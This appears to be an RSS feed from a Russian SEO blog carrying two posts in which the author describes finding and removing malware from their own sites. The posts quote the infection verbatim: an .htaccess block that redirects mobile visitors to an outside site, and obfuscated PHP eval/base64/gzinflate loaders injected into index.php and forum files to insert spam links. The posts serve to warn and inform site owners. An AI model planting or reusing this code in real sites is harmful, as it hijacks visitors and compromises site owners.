<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ставрополь-SEO &#187; вирусы</title>
	<atom:link href="http://seostav.ru/tag/virusy/feed/" rel="self" type="application/rss+xml" />
	<link>http://seostav.ru</link>
	<description>поисковая оптимизация сайтов в Ставрополе и не только</description>
	<lastBuildDate>Tue, 17 Apr 2012 08:47:21 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Вирусы на сайтах</title>
		<link>http://seostav.ru/2012/04/virusy-na-sajtax/</link>
		<comments>http://seostav.ru/2012/04/virusy-na-sajtax/#comments</comments>
		<pubDate>Tue, 17 Apr 2012 08:39:14 +0000</pubDate>
		<dc:creator>seostav</dc:creator>
				<category><![CDATA[Ахтунг]]></category>
		<category><![CDATA[обновление]]></category>
		<category><![CDATA[вирусы]]></category>

		<guid isPermaLink="false">http://seostav.ru/?p=129</guid>
		<description><![CDATA[Сегодня случайно заметил что при переходе по ссылке на один из моих ресурсов открывается не мой сайт, а срабатывает редирект. Почесал репу почему так? Ведь если в браузере набрать имясайта.ру то открывалось всегда то что нужно. А вот если перейти по ссылке с другого сайта то открывалась opera123.net или operamo.net Почесал репу в .htaccess нашел [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://seostav.ru/wp-content/uploads/2012/04/virus_na_saite.gif"><img class="size-medium wp-image-135 aligncenter" title="вирусы на сайте" src="http://seostav.ru/wp-content/uploads/2012/04/virus_na_saite-300x300.gif" alt="" width="300" height="300" /></a></p>
<p>Сегодня случайно заметил что при переходе по ссылке на один из моих ресурсов открывается не мой сайт, а срабатывает редирект. Почесал репу почему так? Ведь если в браузере набрать имясайта.ру то открывалось всегда то что нужно. А вот если перейти по ссылке с другого сайта то открывалась opera123.net или operamo.net</p>
<p>Почесал репу в .htaccess нашел следущее:</p>
<blockquote><p>RewriteEngine on<br />
RewriteCond %{HTTP_ACCEPT} &#171;text/vnd.wap.wml|application/vnd.wap.xhtml+xml&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;wapp|wapr|webc|winw|winw|xda|xda-&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;up.browser|up.link|windowssce|iemobile|mini|mmp&#187; [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} &#171;symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android&#187; [NC]<br />
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]<br />
RewriteCond %{HTTP_USER_AGENT} !america [NC]<br />
RewriteCond %{HTTP_USER_AGENT} !avant [NC]<br />
RewriteCond %{HTTP_USER_AGENT} !download [NC]<br />
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]<br />
RewriteRule ^(.*)$ http://ru-phone.com [L,R=302]<br />
&lt;IfModule mod_rewrite.c&gt;<br />
RewriteEngine On<br />
RewriteBase /<br />
RewriteCond %{REQUEST_FILENAME} !-f<br />
RewriteCond %{REQUEST_FILENAME} !-d<br />
RewriteRule . /index.php [L]<br />
&lt;/IfModule&gt;</p></blockquote>
<p>нижние семь строчек созданы самим wordpressом а вот верхние не мои, удалил все кроме нижних семи проблема осталась все равно.</p>
<p>также посмотрел по датам изменения файлов нашел что последний раз менялся index.php в нем я нашел следущее:</p>
<blockquote><p>&lt;?php eval(&#171;\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28&#8242;jVNtT9tADP4+af8hQxNtBW0hgQQEbKtKYPsyoQ72pYmqa2Kao/cSckebbt5/n9OkA7ROWiS/nv3YZ1/4vdNu5wXMJpLZJGu3+hZKG/UXKu0tWd5bSoEszwVPmOVaPR+UmZUi2iul6Bve2nc+vZ98C0ffw9G49fn29mYyGA7Dm9tW3HEQnVcFmCAsIFipOTKVFpqnyBZM2ZnGqWDJfApFscIpqEdMQAhMCp7MwWKqEy01gmBcAWY2QQ5ST7kA5HmmVSVYWrFHYjrFB1cCPhA26hwK1pNccZQ8zVFKIkolZnWhBUMFSReVnnOGOROSmGJGK55gnnHBc4N1CcNmINFkrMjRcOiikaywzZlWKzQrOeVMoe02vdFlnww+5VFvWuilgWKtC67muNApu68yaaS4hKk2uOQFCDAGy5RhqbXEHxa2z/iOrMngOvy6dc7SACuSDGX08fFiO8AovApH4YiyO87urvPudT5LuLLaZLQpoA2wekm0haUSmua85Ip0E3UlpJxF3VywFV1uRTuFEmdaz8T/NN5xfr5949BXc0gy7bTODS09tx8WrHAmByUcwsnFeCcqvWFUBl5U+kSBS/J0Z5/cwQHRUVS6jQxOa59/TCmX5Hdrf2UHJ03sFdkDokOy/Ua+gn6B6zbYmzPvGddv8NZEMd6gxq6oig2opnvZ9EOxflU3rHtxwxpr7busc7yr7Xeoeq3qu37T53HTC0nfr2LqUbxwbUI2vsBdh1Rde2E9zHWX/x6oF9Zm8GIm6znuxGf0Oz5JUHbcLGh8HMftjX4Q723Uw3gPVKJTuBt9GWqZ03tXtv1XthvHnT853nP6Udw5O+8376F1Vr+Se/qlsnaHrF+/AQ==&#8217;\x29\x29\x29\x3B&#187;); ?&gt;</p></blockquote>
<p>что, как я понял остатки от вируса, удалил строку и все стало переходить нормально.</p>
<p>Быстро прочекать на зараженность вашего сайта можно по этой ссылке: <a title="http://www.virusdie.ru/index.php" href="http://www.virusdie.ru/index.php">http://www.virusdie.ru/index.php</a></p>
<p>Так что если Ваш <strong>сайт заражен вирусом быстренько</strong> идите лечиться.</p>
<p>Признаки заражения:</p>
<ul>
<li>просадка трафика;</li>
<li>при переходе по вашей ссылке с другого сайта открывается все что угодно только не ваш сайт.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://seostav.ru/2012/04/virusy-na-sajtax/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ахтунг вирусы на сайтах.</title>
		<link>http://seostav.ru/2009/06/axtung-virusy-na-sajtax/</link>
		<comments>http://seostav.ru/2009/06/axtung-virusy-na-sajtax/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 21:11:36 +0000</pubDate>
		<dc:creator>seostav</dc:creator>
				<category><![CDATA[Ахтунг]]></category>
		<category><![CDATA[sape]]></category>
		<category><![CDATA[SMF]]></category>
		<category><![CDATA[вирусы]]></category>
		<category><![CDATA[сапа]]></category>
		<category><![CDATA[форумы]]></category>

		<guid isPermaLink="false">http://seostav.ru/?p=7</guid>
		<description><![CDATA[Модерирую я, значит, один форум, на SMF движке. Все вроде нормально вот только чтото он автоматом обновляться перестал. Не придал этому значения (и еще месяца 3 не придавал), пока не зашел в сапу и не увидел что у меня с морды его 60 (шисят!!!!) ссылок. Ну думаю непорядок, полез копаться в исходниках и что я [...]]]></description>
			<content:encoded><![CDATA[<p>Модерирую я, значит, один форум, на SMF движке. Все вроде нормально вот только чтото он автоматом обновляться перестал. Не придал этому значения (и еще месяца 3 не придавал), пока не зашел в сапу и не увидел что у меня с морды его 60 (шисят!!!!) ссылок. Ну думаю непорядок, полез копаться в исходниках и что я вижу? почти во всех php файлах в самом верху есть такая строчка:</p>
<p>{code type=php}</p>
<p><?php eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91MTcxNDIvZm9ydW0udmlueWV0a2EucnUvd3d3L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91MTcxNDIvZm9ydW0udmlueWV0a2EucnUvd3d3L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19&#038;')); ?><br />
{/code}</p>
<p><code></p>
<p>Посмотрел я на это думаю - непорядок начал вычищать, порядка 60 файлов очистил, проверяю - один фиг. В общем оказалось что эта зараза еще была в директории со стандартной темой и маскироавлась под cssку. Удаляю ее и вуаля, с морды всего 8 сцылок из которых 3 продажных остальные были в тему вшиты. Заодно заноуиндексил и их.</p>
<p>Думаю что данная инфа будет полезна сапоторговцам. Будут вопросы чиркайте в камменты, как говориться помогу чем смогу.</p>
<p>ЗЫ. Не храните пароли в куках, на собственной шкуре убедился что это не есть хорошо.</p>
]]></content:encoded>
			<wfw:commentRss>http://seostav.ru/2009/06/axtung-virusy-na-sajtax/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

